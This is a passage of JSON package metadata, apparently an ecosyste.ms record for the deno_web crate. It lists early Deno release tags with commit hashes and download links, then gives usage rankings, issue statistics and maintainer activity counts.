g","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-31T15:19:49.848Z","dependent_packages_count":24,"downloads":1603303,"downloads_period":"total","dependent_repos_count":199,"rankings":{"downloads":3.812250550442299,"dependent_repos_count":2.768938716127376,"dependent_packages_count":1.7310729540273704,"stargazers_count":0.002334030949250387,"forks_count":0.05912878404767647,"docker_downloads_count":3.08896531333157,"average":1.9104483914875905},"purl":"pkg:cargo/deno_web","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_web","docker_dependents_count":30,"docker_downloads_count":23282372,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_web","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_web/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-31T04:05:42.345Z","issues_count":6636,"pull_requests_count":9651,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1531932.6714801444,"issues_closed_count":3798,"pull_requests_closed_count":8032,"pull_request_authors_count":583,"issue_authors_count":2480,"avg_comments_per_issue":2.5051235684147075,"avg_comments_per_pull_request":0.7197181639208372,"merged_pull_requests_count":7013,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":671,"past_year_pull_requests_count":1202,"past_year_avg_time_to_close_issue":1410952.7079646017,"past_year_avg_time_to_close_pull_request":1322346.2602118002,"past_year_issues_closed_count":226,"past_year_pull_requests_closed_count":661,"past_year_pull_request_authors_count":186,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.232488822652757,"past_year_avg_comments_per_pull_request":1.1123128119800334,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":13,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"v